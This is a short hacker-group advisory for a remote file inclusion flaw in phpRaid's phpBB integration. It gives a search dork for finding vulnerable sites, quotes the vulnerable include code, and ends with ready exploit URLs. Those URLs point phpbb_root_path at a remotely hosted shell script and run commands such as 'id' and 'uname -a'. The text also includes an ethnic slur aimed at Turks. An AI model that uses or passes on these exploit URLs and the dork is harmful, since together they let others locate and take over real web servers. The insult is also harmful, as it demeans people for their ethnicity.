# Kurdish Security Advisory # phpRaid Remote File Include [PHPBB] :}
# "Sosyalizim'de ısrar insan olmakta ısrardır" Abdullah Ocalan # Contact : irc.gigachat.net #kurdhack & www.PatrioticHackers.com & [EMAIL PROTECTED] # Script : phpRaid # Script Website : http://www.spiffyjr.com/ # Version : phpRaid v2.9.5 " v3.0.b1 " v3.0.b2 " v3.0.b3 # Risk : High # Class : Remote # Thanks : B3g0k, Nistiman, Flot, Netqurd, Darki, And Kurdish Hackers and Security Guards :D # Special Bastard : Turkish Lame # w0rkz : "phpRaid" "inurl:"phpRaid" etc. :) --------------------------------------------------------------------- # cmd shell example: # cmd shell variable: ($_GET[cmd]); Vulnerable code : At first for phpbb portal :) } ?> // define our auth type define("AUTH","phpbb"); // database connection global $user_group_table; $user_group_table = $phpbb_prefix . "user_group"; // setup phpBB user integration define('IN_PHPBB', true); // set this as the path to your phpBB installation include($phpbb_root_path . 'extension.inc'); include($phpbb_root_path . 'common.'.$phpEx); ----------------------------------------------------------------- http://www.site.com/[phpraidpath]/auth/auth.php?phpbb_root_path=http://www.yourcode.com/x.txt?&cmd=id http://www.site.com/[phpraidpath]/auth/auth_phpbb/phpbb_root_path=http://www.yourcode.com/x.txt?&cmd=uname -a
